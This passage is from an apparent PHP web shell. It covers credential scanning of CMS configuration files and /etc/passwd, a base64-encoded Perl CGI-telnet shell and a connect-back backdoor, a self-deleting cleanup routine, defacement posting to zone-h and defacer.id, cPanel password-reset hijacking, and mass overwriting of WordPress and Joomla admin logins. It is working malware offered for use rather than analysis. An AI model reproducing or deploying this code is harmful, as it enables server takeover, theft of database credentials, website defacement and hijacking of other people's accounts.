  711. } elseif ($_POST['scanpass']) {
  712. echo "<center>
  713. <form method='post'>
  714. USER: <br>
  715. <textarea style='width: 450px; height: 150px;' name='user_cp'>";
  716. $_usercp = $etcpasswd;
  717. preg_match_all("/(.*?):x:/", $_usercp, $u);
  718. foreach ($u[1] as $user_cp) {
  719. // if (is_dir("/home/$user_cp/public_html")) {
  720. echo "$user_cp\n";
  722. // }
  723. }
  724. echo "</textarea><br>
  725. PASS: <br>
  726. <textarea style='width: 450px; height: 200px;' name='pass_cp'>";
  727. function cp_pass($dir)
  728. {
  729. $pass = "";
  730. $dira = scandir($dir);
  731. foreach ($dira as $dirb) {
  732. if (!is_file("$dir/$dirb")) {
  733. continue;
  734. }
  736. $ambil = file_get_contents("$dir/$dirb");
  737. if (preg_match("/WordPress/", $ambil)) {
  738. $pass .= ambilkata($ambil, "DB_PASSWORD', '", "'") . "\n";
  739. } elseif (preg_match("/JConfig|joomla/", $ambil)) {
  740. $pass .= ambilkata($ambil, "password = '", "'") . "\n";
  741. } elseif (preg_match("/konekDB/", $ambil)) {
  742. $pass .= ambilkata($ambil, "$password = '", "'") . "\n";
  743. } elseif (preg_match("/cmsmember/", $ambil)) {
  744. $pass .= ambilkata($ambil, 'dbpasswd = "', '"') . "\n";
  745. } elseif (preg_match("/Magento|Mage_Core/", $ambil)) {
  746. $pass .= ambilkata($ambil, "<password><![CDATA[", "]]></password>") . "\n";
  747. } elseif (preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) {
  748. $pass .= ambilkata($ambil, 'password = "', '"') . "\n";
  749. } elseif (preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) {
  750. $pass .= ambilkata($ambil, "'DB_PASSWORD', '", "'") . "\n";
  751. } elseif (preg_match("/client/", $ambil)) {
  752. preg_match("/password=(.*)/", $ambil, $pass1);
  753. if (preg_match('/"/', $pass1[1])) {
  754. $pass1[1] = str_replace('"', "", $pass1[1]);
  755. $pass .= $pass1[1] . "\n";
  756. }
  757. } elseif (preg_match("/cc_encryption_hash/", $ambil)) {
  758. $pass .= ambilkata($ambil, "db_password = '", "'") . "\n";
  759. }
  760. }
  761. echo $pass;
  762. }
  763. $cp_pass = cp_pass($dir);
  764. echo $cp_pass;
  765. echo "</textarea><br>
  766. <input type='submit' name='crack' style='width: 450px;' value='Crack'>
  767. </form>
  768. <br></center>";
  769. } else {
  770. echo "<center>
  771. <form method='post'>
  772. USER: <br>
  773. <textarea style='width: 450px; height: 150px;' name='user_cp'>";
  774. $_usercp = $etcpasswd;
  775. preg_match_all("/(.*?):x:/", $_usercp, $u);
  776. foreach ($u[1] as $user_cp) {
  777. // if (is_dir("/home/$user_cp/public_html")) {
  778. echo "$user_cp\n";
  780. // }
  781. }
  782. echo "</textarea><br>
  783. PASS: <br>
  784. <textarea style='width: 450px; height: 200px;' name='pass_cp'></textarea><br>
  785. <input type='submit' name='crack' style='width: 450px;' value='Crack'>
  786. <input type='submit' name='scanpass' style='width: 450px;' value='Scan Password'>
  787. </form>
  788. <br></center>";
  789. }
  790. } elseif (isset($_GET['do']) && ($_GET['do'] == 'cgi')) {
  791. echo "<center/><br/><b><font color=blue>+--==[ cgitelnet.v1 Bypass Exploit]==--+ </font></b><br><br>";
  792. mkdir('cgitelnet1', 0755);
  793. chdir('cgitelnet1');
  794. $kokdosya = ".htaccess";
  795. $dosya_adi = "$kokdosya";
  796. $dosya = fopen($dosya_adi, 'w') or die("Dosya a&#231;&#305;lamad&#305;!");
  797. $metin = "Options FollowSymLinks MultiViews Indexes ExecCGI
  799. AddType application/x-httpd-cgi .cin
  801. AddHandler cgi-script .cin
  802. AddHandler cgi-script .cin";
  803. fwrite($dosya, $metin);
  804. fclose($dosya);
  805. $cgishellizocin = 'IyEvdXNyL2Jpbi9wZXJsCiMgQ29weXJpZ2h0IChDKSAyMDAxIFJvaGl0YWIgQmF0cmEKIyBSZWNvZGVkIEJ5IDB4MTk5OQoKJFdpbk5UID0gMDsKJE5UQ21kU2VwID0gIiYiOwokVW5peENtZFNlcCA9ICI7IjsKJENvbW1hbmRUaW1lb3V0RHVyYXRpb24gPSAxMDsKJFNob3dEeW5hbWljT3V0cHV0ID0gMTsKJENtZFNlcCA9ICgkV2luTlQgPyAkTlRDbWRTZXAgOiAkVW5peENtZFNlcCk7CiRDbWRQd2QgPSAoJFdpbk5UID8gImNkIiA6ICJwd2QiKTsKJFBhdGhTZXAgPSAoJFdpbk5UID8gIlxcIiA6ICIvIik7CiRSZWRpcmVjdG9yID0gKCRXaW5OVCA/ICIgMj4mMSAxPiYyIiA6ICIgMT4mMSAyPiYxIik7CnN1YiBSZWFkUGFyc2UgCnsKCWxvY2FsICgqaW4pID0gQF8gaWYgQF87Cglsb2NhbCAoJGksICRsb2MsICRrZXksICR2YWwpOwoJCgkkTXVsdGlwYXJ0Rm9ybURhdGEgPSAkRU5WeydDT05URU5UX1RZUEUnfSA9fiAvbXVsdGlwYXJ0XC9mb3JtLWRhdGE7IGJvdW5kYXJ5PSguKykkLzsKCglpZigkRU5WeydSRVFVRVNUX01FVEhPRCd9IGVxICJHRVQiKQoJewoJCSRpbiA9ICRFTlZ7J1FVRVJZX1NUUklORyd9OwoJfQoJZWxzaWYoJEVOVnsnUkVRVUVTVF9NRVRIT0QnfSBlcSAiUE9TVCIpCgl7CgkJYmlubW9kZShTVERJTikgaWYgJE11bHRpcGFydEZvcm1EYXRhICYgJFdpbk5UOwoJCXJlYWQoU1RESU4sICRpbiwgJEVOVnsnQ09OVEVOVF9MRU5HVEgnfSk7Cgl9CgoJIyBoYW5kbGUgZmlsZSB1cGxvYWQgZGF0YQoJaWYoJEVOVnsnQ09OVEVOVF9UWVBFJ30gPX4gL211bHRpcGFydFwvZm9ybS1kYXRhOyBib3VuZGFyeT0oLispJC8pCgl7CgkJJEJvdW5kYXJ5ID0gJy0tJy4kMTsgIyBwbGVhc2UgcmVmZXIgdG8gUkZDMTg2NyAKCQlAbGlzdCA9IHNwbGl0KC8kQm91bmRhcnkvLCAkaW4pOyAKCQkkSGVhZGVyQm9keSA9ICRsaXN0WzFdOwoJCSRIZWFkZXJCb2R5ID1+IC9cclxuXHJcbnxcblxuLzsKCQkkSGVhZGVyID0gJGA7CgkJJEJvZHkgPSAkJzsKIAkJJEJvZHkgPX4gcy9cclxuJC8vOyAjIHRoZSBsYXN0IFxyXG4gd2FzIHB1dCBpbiBieSBOZXRzY2FwZQoJCSRpbnsnZmlsZWRhdGEnfSA9ICRCb2R5OwoJCSRIZWFkZXIgPX4gL2ZpbGVuYW1lPVwiKC4rKVwiLzsgCgkJJGlueydmJ30gPSAkMTsgCgkJJGlueydmJ30gPX4gcy9cIi8vZzsKCQkkaW57J2YnfSA9fiBzL1xzLy9nOwoKCQkjIHBhcnNlIHRyYWlsZXIKCQlmb3IoJGk9MjsgJGxpc3RbJGldOyAkaSsrKQoJCXsgCgkJCSRsaXN0WyRpXSA9fiBzL14uK25hbWU9JC8vOwoJCQkkbGlzdFskaV0gPX4gL1wiKFx3KylcIi87CgkJCSRrZXkgPSAkMTsKCQkJJHZhbCA9ICQnOwoJCQkkdmFsID1+IHMvKF4oXHJcblxyXG58XG5cbikpfChcclxuJHxcbiQpLy9nOwoJCQkkdmFsID1+IHMvJSguLikvcGFjaygiYyIsIGhleCgkMSkpL2dlOwoJCQkkaW57JGtleX0gPSAkdmFsOyAKCQl9Cgl9CgllbHNlICMgc3RhbmRhcmQgcG9zdCBkYXRhICh1cmwgZW5jb2RlZCwgbm90IG11bHRpcGFydCkKCXsKCQlAaW4gPSBzcGxpdCgvJi8sICRpbik7CgkJZm9yZWFjaCAkaSAoMCAuLiAkI2luKQoJCXsKCQkJJGluWyRpXSA9fiBzL1wrLyAvZzsKCQkJKCRrZXksICR2YWwpID0gc3BsaXQoLz0vLCAkaW5bJGldLCAyKTsKCQkJJGtleSA9fiBzLyUoLi4pL3BhY2soImMiLCBoZXgoJDEpKS9nZTsKCQkJJHZhbCA9fiBzLyUoLi4pL3BhY2soImMiLCBoZXgoJDEpKS9nZTsKCQkJJGlueyRrZXl9IC49ICJcMCIgaWYgKGRlZmluZWQoJGlueyRrZXl9KSk7CgkJCSRpbnska2V5fSAuPSAkdmFsOwoJCX0KCX0KfQpzdWIgUHJpbnRQYWdlSGVhZGVyCnsKCSRFbmNvZGVkQ3VycmVudERpciA9ICRDdXJyZW50RGlyOwoJJEVuY29kZWRDdXJyZW50RGlyID1+IHMvKFteYS16QS1aMC05XSkvJyUnLnVucGFjaygiSCoiLCQxKS9lZzsKCXByaW50ICJDb250ZW50LXR5cGU6IHRleHQvaHRtbFxuXG4iOwoJcHJpbnQgPDxFTkQ7CjxodG1sPgo8aGVhZD4KPHRpdGxlPkNHSS1UZWxuZXQgVmVyc2lvbiAxLjA8L3RpdGxlPgokSHRtbE1ldGFIZWFkZXIKPC9oZWFkPgo8Ym9keSBvbkxvYWQ9ImRvY3VtZW50LmYuQF8uZm9jdXMoKSIgYmdjb2xvcj0iIzBBMEEwQSIgdG9wbWFyZ2luPSIwIiBsZWZ0bWFyZ2luPSIwIiBtYXJnaW53aWR0aD0iMCIgbWFyZ2luaGVpZ2h0PSIwIj4KPGEgaHJlZj0iJFNjcmlwdExvY2F0aW9uP2E9dXBsb2FkJmQ9JEVuY29kZWRDdXJyZW50RGlyIj5VcGxvYWQgRmlsZTwvYT4gfCAKPGEgaHJlZj0iJFNjcmlwdExvY2F0aW9uP2E9ZG93bmxvYWQmZD0kRW5jb2RlZEN1cnJlbnREaXIiPkRvd25sb2FkIEZpbGU8L2E+IHwKPGEgaHJlZj0iJFNjcmlwdExvY2F0aW9uP2E9bG9nb3V0Ij5EaXNjb25uZWN0PC9hPiB8CjxhIGhyZWY9Imh0dHA6Ly93d3cucm9oaXRhYi5jb20vY2dpc2NyaXB0cy9jZ2l0ZWxuZXQuaHRtbCI+SGVscDwvYT48YnI+Cjxmb250IGNvbG9yPSIjQzBDMEMwIiBzaXplPSIzIj4KRU5ECn0Kc3ViIFByaW50UGFnZUZvb3Rlcgp7CglwcmludCAiPC9mb250PjwvYm9keT48L2h0bWw+IjsKfQpzdWIgR2V0Q29va2llcwp7CglAaHR0cGNvb2tpZXMgPSBzcGxpdCgvOyAvLCRFTlZ7J0hUVFBfQ09PS0lFJ30pOwoJZm9yZWFjaCAkY29va2llKEBodHRwY29va2llcykKCXsKCQkoJGlkLCAkdmFsKSA9IHNwbGl0KC89LywgJGNvb2tpZSk7CgkJJENvb2tpZXN7JGlkfSA9ICR2YWw7Cgl9Cn0Kc3ViIFByaW50Q29tbWFuZExpbmVJbnB1dEZvcm0KewoJJFByb21wdCA9ICRXaW5OVCA/ICIkQ3VycmVudERpcj4gIiA6ICJbYWRtaW5cQCRTZXJ2ZXJOYW1lICRDdXJyZW50RGlyXVwkICI7CglwcmludCA8PEVORDsKPGNvZGU+Cjxmb3JtIG5hbWU9ImYiIG1ldGhvZD0iUE9TVCIgYWN0aW9uPSIkU2NyaXB0TG9jYXRpb24iPgo8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJhIiB2YWx1ZT0iY29tbWFuZCI+CjxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9ImQiIHZhbHVlPSIkQ3VycmVudERpciI+CiRQcm9tcHQKPGlucHV0IHR5cGU9InRleHQiIG5hbWU9ImMiPgo8aW5wdXQgdHlwZT0ic3VibWl0IiB2YWx1ZT0iRW50ZXIiPgo8L2Zvcm0+CjwvY29kZT4KRU5ECn0Kc3ViIENvbW1hbmRUaW1lb3V0CnsKCWlmKCEkV2luTlQpCgl7CgkJYWxhcm0oMCk7CgkJcHJpbnQgPDxFTkQ7CjwveG1wPgo8Y29kZT4KQ29tbWFuZCBleGNlZWRlZCBtYXhpbXVtIHRpbWUgb2YgJENvbW1hbmRUaW1lb3V0RHVyYXRpb24gc2Vjb25kKHMpLgo8YnI+S2lsbGVkIGl0IQo8Y29kZT4KRU5ECgkJJlByaW50Q29tbWFuZExpbmVJbnB1dEZvcm07CgkJJlByaW50UGFnZUZvb3RlcjsKCQlleGl0OwoJfQp9CnN1YiBFeGVjdXRlQ29tbWFuZAp7CglpZigkUnVuQ29tbWFuZCA9fiBtL15ccypjZFxzKyguKykvKSAjIGl0IGlzIGEgY2hhbmdlIGRpciBjb21tYW5kCgl7CgkJIyB3ZSBjaGFuZ2UgdGhlIGRpcmVjdG9yeSBpbnRlcm5hbGx5LiBUaGUgb3V0cHV0IG9mIHRoZQoJCSMgY29tbWFuZCBpcyBub3QgZGlzcGxheWVkLgoJCQoJCSRPbGREaXIgPSAkQ3VycmVudERpcjsKCQkkQ29tbWFuZCA9ICJjZCBcIiRDdXJyZW50RGlyXCIiLiRDbWRTZXAuImNkICQxIi4kQ21kU2VwLiRDbWRQd2Q7CgkJY2hvcCgkQ3VycmVudERpciA9IGAkQ29tbWFuZGApOwoJCSZQcmludFBhZ2VIZWFkZXIoImMiKTsKCQkkUHJvbXB0ID0gJFdpbk5UID8gIiRPbGREaXI+ICIgOiAiW2FkbWluXEAkU2VydmVyTmFtZSAkT2xkRGlyXVwkICI7CgkJcHJpbnQgIjxjb2RlPiRQcm9tcHQgJFJ1bkNvbW1hbmQ8L2NvZGU+IjsKCX0KCWVsc2UgIyBzb21lIG90aGVyIGNvbW1hbmQsIGRpc3BsYXkgdGhlIG91dHB1dAoJewoJCSZQcmludFBhZ2VIZWFkZXIoImMiKTsKCQkkUHJvbXB0ID0gJFdpbk5UID8gIiRDdXJyZW50RGlyPiAiIDogIlthZG1pblxAJFNlcnZlck5hbWUgJEN1cnJlbnREaXJdXCQgIjsKCQlwcmludCAiPGNvZGU+JFByb21wdCAkUnVuQ29tbWFuZDwvY29kZT48eG1wPiI7CgkJJENvbW1hbmQgPSAiY2QgXCIkQ3VycmVudERpclwiIi4kQ21kU2VwLiRSdW5Db21tYW5kLiRSZWRpcmVjdG9yOwoJCWlmKCEkV2luTlQpCgkJewoJCQkkU0lHeydBTFJNJ30gPSBcJkNvbW1hbmRUaW1lb3V0OwoJCQlhbGFybSgkQ29tbWFuZFRpbWVvdXREdXJhdGlvbik7CgkJfQoJCWlmKCRTaG93RHluYW1pY091dHB1dCkgIyBzaG93IG91dHB1dCBhcyBpdCBpcyBnZW5lcmF0ZWQKCQl7CgkJCSR8PTE7CgkJCSRDb21tYW5kIC49ICIgfCI7CgkJCW9wZW4oQ29tbWFuZE91dHB1dCwgJENvbW1hbmQpOwoJCQl3aGlsZSg8Q29tbWFuZE91dHB1dD4pCgkJCXsKCQkJCSRfID1+IHMvKFxufFxyXG4pJC8vOwoJCQkJcHJpbnQgIiRfXG4iOwoJCQl9CgkJCSR8PTA7CgkJfQoJCWVsc2UgIyBzaG93IG91dHB1dCBhZnRlciBjb21tYW5kIGNvbXBsZXRlcwoJCXsKCQkJcHJpbnQgYCRDb21tYW5kYDsKCQl9CgkJaWYoISRXaW5OVCkKCQl7CgkJCWFsYXJtKDApOwoJCX0KCQlwcmludCAiPC94bXA+IjsKCX0KCSZQcmludENvbW1hbmRMaW5lSW5wdXRGb3JtOwoJJlByaW50UGFnZUZvb3RlcjsKfQomUmVhZFBhcnNlOwomR2V0Q29va2llczsKJFNjcmlwdExvY2F0aW9uID0gJEVOVnsnU0NSSVBUX05BTUUnfTsKJFNlcnZlck5hbWUgPSAkRU5WeydTRVJWRVJfTkFNRSd9OwoKJFJ1bkNvbW1hbmQgPSAkaW57J2MnfTsKJFRyYW5zZmVyRmlsZSA9ICRpbnsnZid9OwokT3B0aW9ucyA9ICRpbnsnbyd9OwokQWN0aW9uID0gJGlueydhJ307CiRBY3Rpb24gPSAiY29tbWFuZCIgaWYoJEFjdGlvbiBlcSAiIik7CiRDdXJyZW50RGlyID0gJGlueydkJ307CmNob3AoJEN1cnJlbnREaXIgPSBgJENtZFB3ZGApIGlmKCRDdXJyZW50RGlyIGVxICIiKTsKaWYoJEFjdGlvbiBlcSAiY29tbWFuZCIpICMgdXNlciB3YW50cyB0byBydW4gYSBjb21tYW5kCnsKCSZFeGVjdXRlQ29tbWFuZDsKfQo=';
  807. $file = fopen("izo.cin", "w+");
  808. $write = fwrite($file, base64_decode($cgishellizocin));
  809. fclose($file);
  810. chmod("izo.cin", 0755);
  811. $netcatshell = 'IyEvdXNyL2Jpbi9wZXJsDQogICAgICB1c2UgU29ja2V0Ow0KICAgICAgcHJpbnQgIkRhdGEgQ2hh
  812. MHMgQ29ubmVjdCBCYWNrIEJhY2tkb29yXG5cbiI7DQogICAgICBpZiAoISRBUkdWWzBdKSB7DQog
  814. MSk7DQogICAgICB9DQogICAgICBwcmludCAiWypdIER1bXBpbmcgQXJndW1lbnRzXG4iOw0KICAg
  817. Kl0gQ29ubmVjdGluZy4uLlxuIjsNCiAgICAgICRwcm90byA9IGdldHByb3RvYnluYW1lKCd0Y3An
  818. KSB8fCBkaWUoIlVua25vd24gUHJvdG9jb2xcbiIpOw0KICAgICAgc29ja2V0KFNFUlZFUiwgUEZf
  819. SU5FVCwgU09DS19TVFJFQU0sICRwcm90bykgfHwgZGllICgiU29ja2V0IEVycm9yXG4iKTsNCiAg
  822. VW5hYmxlIHRvIENvbm5lY3RcbiIpOw0KICAgICAgfQ0KICAgICAgcHJpbnQgIlsqXSBTcGF3bmlu
  825. bihTVERFUlIsIj4mU0VSVkVSIik7DQogICAgICAgIGV4ZWMgeycvYmluL3NoJ30gJy1iYXNoJyAu
  827. YXRhY2hlZFxuXG4iOw==';
  829. $file = fopen("dc.pl", "w+");
  830. $write = fwrite($file, base64_decode($netcatshell));
  831. fclose($file);
  832. chmod("dc.pl", 0755);
  833. echo "<iframe src=cgitelnet1/izo.cin width=100% height=100% frameborder=0></iframe>
  836. </div>";
  838. } elseif (isset($_GET['do']) && ($_GET['do'] == 'deleteme')) {
  839. function delete_dir($dir)
  840. {
  841. if (is_link($dir)) {
  842. unlink($dir);
  843. } elseif (!file_exists($dir)) {
  844. return;
  845. } elseif (is_dir($dir)) {
  846. foreach (scandir($dir) as $file) {
  847. if ($file != '.' && $file != '..') {
  848. delete_dir("$dir/$file");
  849. }
  850. }
  851. rmdir($dir);
  852. } elseif (is_file($dir)) {
  853. unlink($dir);
  854. } else {
  855. echo "WARNING: Cannot delete $dir (unknown file type)\n";
  856. }
  857. }
  858. delete_dir(dirname(__FILE__) . "/0xsym/");
  859. delete_dir(dirname(__FILE__) . "/0xsymlink/");
  860. delete_dir(dirname(__FILE__) . "/MeLeX/");
  861. delete_dir(dirname(__FILE__) . "/0xsymv/");
  862. delete_dir(dirname(__FILE__) . "/0xsym404/");
  863. delete_dir(dirname(__FILE__) . "/cgitelnet1/");
  864. delete_dir(dirname(__FILE__) . "/0x1/");
  865. unlink(__FILE__);
  866. echo "<script>window.location='./';</script>";
  867. } elseif (isset($_GET['do']) && ($_GET['do'] == 'mirror')) {
  868. if ($_POST['arsip'] == '1') {
  869. $domain = explode("\r\n", $_POST['url']);
  870. $nick = $_POST['nick'];
  871. echo "Defacer Onhold: <a href='http://www.zone-h.org/archive/notifier=$nick/published=0' target='_blank'>http://www.zone-h.org/archive/notifier=$nick/published=0</a><br>";
  872. echo "Defacer Archive: <a href='http://www.zone-h.org/archive/notifier=$nick' target='_blank'>http://www.zone-h.org/archive/notifier=$nick</a><br><br>";
  873. function zoneh($url, $nick)
  874. {
  875. $ch = curl_init("http://www.zone-h.com/notify/single");
  876. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  877. curl_setopt($ch, CURLOPT_POST, true);
  878. curl_setopt($ch, CURLOPT_POSTFIELDS, "defacer=$nick&domain1=$url&hackmode=1&reason=1&submit=Send");
  879. return curl_exec($ch);
  880. curl_close($ch);
  881. }
  882. foreach ($domain as $url) {
  883. $zoneh = zoneh($url, $nick);
  884. if (preg_match("/color=\"red\">OK<\/font><\/li>/i", $zoneh)) {
  885. echo "$url -> <font color=lime>OK</font><br>";
  886. } else {
  887. echo "$url -> <font color=red>ERROR</font><br>";
  888. }
  889. }
  890. }if ($_POST['arsip'] == '2') {
  891. $site = explode("\r\n", $_POST['sites']);
  892. $hekel = $_POST['nick'];
  893. $tim = $_POST['tim'];
  894. foreach ($site as $sites) {
  895. $zh = $sites;
  896. $form_url = "https://www.defacer.id/notify";
  897. $data_to_post = array();
  898. $data_to_post['attacker'] = "$hekel";
  899. $data_to_post['team'] = "$tim";
  900. $data_to_post['poc'] = 'SQL Injection';
  901. $data_to_post['url'] = "$zh";
  902. $curl = curl_init();
  903. curl_setopt($curl, CURLOPT_URL, $form_url);
  904. curl_setopt($curl, CURLOPT_POST, sizeof($data_to_post));
  905. curl_setopt($curl, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"); //msnbot/1.0 (+http://search.msn.com/msnbot.htm)
  906. curl_setopt($curl, CURLOPT_POSTFIELDS, $data_to_post);
  907. curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
  908. curl_setopt($curl, CURLOPT_REFERER, 'https://defacer.id/notify.html');
  909. $result = curl_exec($curl);
  910. echo $result;
  911. curl_close($curl);
  912. echo "<br>";
  913. }
  915. } else {
  916. echo "
  917. <script type='text/javascript'>//<![CDATA[
  918. window.onload=function(){
  919. document.getElementById('arsip').addEventListener('change', function () {
  920. var style = this.value == 2 ? 'block' : 'none';
  921. document.getElementById('defacerid').style.display = style;
  922. });
  923. }//]]>
  925. </script><center>
  926. <form method='post'>
  927. <select class='select' id='arsip' name='arsip' style='width: 450px;' height='10'>
  928. <option value='1'>Zone-h</option>
  929. <option value='2'>Defacer ID</option></select><br>
  930. <u>Defacer</u>: <br>
  931. <input type='text' name='nick' size='50' value='0x1999'><br>
  932. <div id='defacerid' style='display: none;'><br>
  933. <u>Team</u>:<br>
  934. <input type='text' name='tim' size='50' value='Indonesian Code Party'><br><br>
  935. </div>
  936. <u>Domains</u>: <br>
  937. <textarea style='width: 450px; height: 150px;' name='url'></textarea><br>
  938. <input type='submit' name='submit' value='Submit' style='width: 450px;'>
  939. </form>";
  940. }
  941. echo "</center>";
  942. } elseif (isset($_GET['do']) && ($_GET['do'] == 'hek')) {
  943. $url = "http://" . $_SERVER['SERVER_NAME'] . "/0x.htm";
  944. $hh = $_SERVER['DOCUMENT_ROOT'] . "/0x.htm";
  945. @file_put_contents($hh, file_get_contents_("http://pastebin.com/raw/PDcuwBug"));
  946. function zoneh($url, $nick)
  947. {
  948. $ch = curl_init("http://www.zone-h.com/notify/single");
  949. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  950. curl_setopt($ch, CURLOPT_POST, true);
  951. curl_setopt($ch, CURLOPT_POSTFIELDS, "defacer=$nick&domain1=$url&hackmode=1&reason=1&submit=Send");
  952. return curl_exec($ch);
  953. curl_close($ch);
  954. }
  955. $zoneh = zoneh($url, "0x1999");
  956. if (preg_match("/color=\"red\">OK<\/font><\/li>/i", $zoneh)) {
  957. echo "$url -> <font color=lime>OK</font><br>";
  958. } else {
  959. echo "$url -> <font color=red>ERROR</font><br>";
  960. }
  961. } elseif (isset($_GET['do']) && ($_GET['do'] == 'cpres')) {
  962. echo "Enter email account : <form method='post'><input type='text' name='email' value='resetpass@hi2.in'>
  963. File Target : <input type='text' name='contactemail' value='/home/" . $user . "/.contactemail'>
  964. File Target : <input type='text' name='contactinfo' value='/home/" . $user . "/.cpanel/contactinfo'><br>
  965. <input type='submit' value='Gas'></form>";
  966. if ($_POST['email']) {
  967. $file3 = $_POST['email'];
  968. $fp3 = fopen($_POST['contactemail'], "w");
  969. $fw3 = fwrite($fp3, $file3);
  970. @fclose($fp3);
  971. $fp4 = fopen($_POST['contactinfo'], "w");
  972. $fw4 = fwrite($fp4, $file3);
  973. @fclose($fp4);
  974. $link = $_SERVER['HTTP_HOST'];
  975. echo "Login here : <a href='https://$link:2083/resetpass?start=1&user=$user' target='_BLANK'>https://$link:2083/resetpass?start=1&user=$user</a> or <a href='http://$link:2082/resetpass?start=1&user=$user' target='_BLANK'>http://$link:2082/resetpass?start=1&user=$user</a>";
  976. }
  977. } elseif (isset($_GET['do']) && ($_GET['do'] == 'crp')) {
  978. if (isset($_POST['gass'])) {
  979. echo "<center><h1>Config Reset Password</h1>
  980. <form method='post'>
  981. Link Config: <br>
  982. <textarea name='link' style='width: 450px; height:250px;'>";
  983. UrlLoop($_POST['linkconf'], $_POST['tipe']);
  984. echo "</textarea><br>
  985. <input type='submit' style='width: 450px;' name='ngentuconfig' value='Hajar!!'>
  986. </form></center>";
  987. } else {
  988. echo '<center>
  989. <h1>Config Reset Password</h1>
  990. <form method="post">
  991. Select Type :<br><select class="select" name="tipe" style="width: 450px;" height="10">
  992. <option value="Wordpress">Wordpress</option>
  993. <option value="Joomla">Joomla</option>
  994. <option value="Lokomedia">Lokomedia</option>
  995. <option value="Magento">Magento</option>
  996. <option value="OpenCart">OpenCart</option>
  997. <option value="txt">All Config</option>
  998. </select><br>
  999. Link Config :<br>
  1000. <input type="text" name="linkconf" height="10" style="width: 450px;" placeholder="http://0xdark.com/cox_symconf/"><br>
  1001. <input type="submit" style="width: 450px;" name="gass" value="Hajar!!">
  1002. </form></center>';
  1003. }
  1004. if (isset($_POST['ngentuconfig'])) {
  1005. echo "<center><table style='width:100%'>
  1006. <tr>
  1007. <th>CMS</th>
  1008. <th>User</th>
  1009. <th>Password</th>
  1010. <th>Login</th>
  1011. <th>Config</th>
  1012. </tr>";
  1013. $user = '0x1999';
  1014. $pass = "0x1999";
  1015. $passx = md5($pass);
  1016. $link = explode("\r\n", $_POST['link']);
  1018. foreach ($link as $file_conf) {
  1019. $config = file_get_contents_($file_conf);
  1020. if (preg_match("/JConfig|joomla/", $config)) {
  1021. $dbhost = ambilkata($config, "host = '", "'");
  1022. $dbuser = ambilkata($config, "user = '", "'");
  1023. $dbpass = ambilkata($config, "password = '", "'");
  1024. $dbname = ambilkata($config, "db = '", "'");
  1025. $dbprefix = ambilkata($config, "dbprefix = '", "'");
  1026. $prefix = $dbprefix . "users";
  1027. $conn = mysqli_connect($dbhost, $dbuser, $dbpass);
  1028. $db = mysqli_select_db($conn,$dbname);
  1029. $q = mysqli_query($conn,"SELECT * FROM $prefix ORDER BY id ASC");
  1030. $result = mysqli_fetch_array($q,MYSQLI_ASSOC);
  1031. $id = $result['id'];
  1032. $site = ambilkata($config, "sitename = '", "'");
  1033. $update = mysqli_query($conn,"UPDATE $prefix SET username='$user',password='$passx' WHERE id='$id'");
  1034. echo "<tr><td>Joomla</td>";
  1035. //echo "[ ".$file_conf." ]<br>";
  1036. //echo "CMS => Joomla<br>";
  1037. if ($site == '') {
  1038. $url_target = "<font color=red>ERROR</font><br>";
  1039. } else {
  1040. $url_target = $site;
  1041. }
  1042. if (!$update) {
  1043. echo "<td><font color=red>" . mysqli_error() . "</font></td><td>Update Error</td><td>!</td><td>" . $file_conf . "</td>";
  1044. } elseif (!$conn) {
  1045. echo "<td><font color=red>" . mysqli_error() . "</font></td><td>Connection Error</td><td>!</td><td>" . $file_conf . "</td>";
  1046. } elseif (!$db) {
  1047. echo "<td><font color=red>" . mysqli_error() . "</font></td><td>DB Error</td><td>!</td><td>" . $file_conf . "</td>";
  1048. } else {
  1049. echo "<td><font color=lime>$user</font></td>";
  1050. echo "<td><font color=lime>$pass</font></td>";
  1051. echo "<td><a href=\"https://www.google.com/search?source=hp&q='$url_target'\" target=\"_BLANK\">$url_target</a></td>";
  1052. echo "<td>" . $file_conf . "</td>";
  1053. }
  1054. echo "</tr>";
  1055. mysqli_close($conn);
  1056. } elseif (preg_match("/WordPress/", $config)) {
  1057. $dbhost = ambilkata($config, "DB_HOST', '", "'");
  1058. $dbuser = ambilkata($config, "DB_USER', '", "'");
  1059. $dbpass = ambilkata($config, "DB_PASSWORD', '", "'");
  1060. $dbname = ambilkata($config, "DB_NAME', '", "'");
  1061. $dbprefix = ambilkata($config, "table_prefix = '", "'");
  1062. $prefix = $dbprefix . "users";
  1063. $option = $dbprefix . "options";
  1064. $conn = mysqli_connect($dbhost, $dbuser, $dbpass);
  1065. $db = mysqli_select_db($conn,$dbname);
  1066. $q = mysqli_query($conn,"SELECT * FROM $prefix ORDER BY id ASC");
  1067. $result = mysqli_fetch_array($q,MYSQLI_ASSOC);
  1068. $id = $result["ID"];
  1069. $q2 = mysqli_query($conn,"SELECT * FROM $option ORDER BY option_id ASC");
  1070. $result2 = mysqli_fetch_array($q2,MYSQLI_ASSOC);
  1071. $target = $result2["option_value"];
  1072. if ($target == '') {
  1073. $url_target = "<font color=red>DOMAIN ERROR</font>";
  1074. } else {
  1075. $url_target = "<a href='$target/wp-login.php' target='_blank'><u>$target/wp-login.php</u></a>";
  1076. }
  1077. $update = mysqli_query($conn,"UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE id='$id'");
  1078. echo "<tr><td>Wordpress</td>";
  1079. //echo "[ ".$file_conf." ]<br>";
  1080. //echo $url_target;
  1081. if (!$update or !$conn or !$db) {
  1082. echo "<td><font color=red>" . mysqli_error() . "</font></td><td>!</td><td>!</td><td>" . $file_conf . "</td>";
  1083. } else {
  1084. echo "<td><font color=lime>$user</font></td>";
  1085. echo "<td><font color=lime>$pass</font></td>";
  1086. echo "<td>$url_target</td>";
  1087. echo "<td>" . $file_conf . "</td>";
  1088. }
  1089. echo "</tr>";
  1090. mysqli_close($conn);
  1091. } elseif (preg_match("/Magento|Mage_Core/", $config)) {
  1092. $dbhost = ambilkata($config, "<host><![CDATA[", "]]></host>");
  1093. $dbuser = ambilkata($config, "<username><![CDATA[", "]]></username>");
